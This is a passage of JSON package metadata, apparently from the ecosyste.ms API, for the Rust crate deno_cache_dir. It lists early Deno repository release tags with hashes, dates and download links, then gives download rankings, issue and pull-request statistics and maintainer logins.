cosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-23T09:39:12.062Z","dependent_packages_count":1,"downloads":868757,"downloads_period":"total","dependent_repos_count":1,"rankings":{"downloads":13.077606297778013,"dependent_repos_count":16.750609631030787,"dependent_packages_count":18.155229912562575,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":15.994481947123793},"purl":"pkg:cargo/deno_cache_dir","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_cache_dir","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_cache_dir","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_cache_dir/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/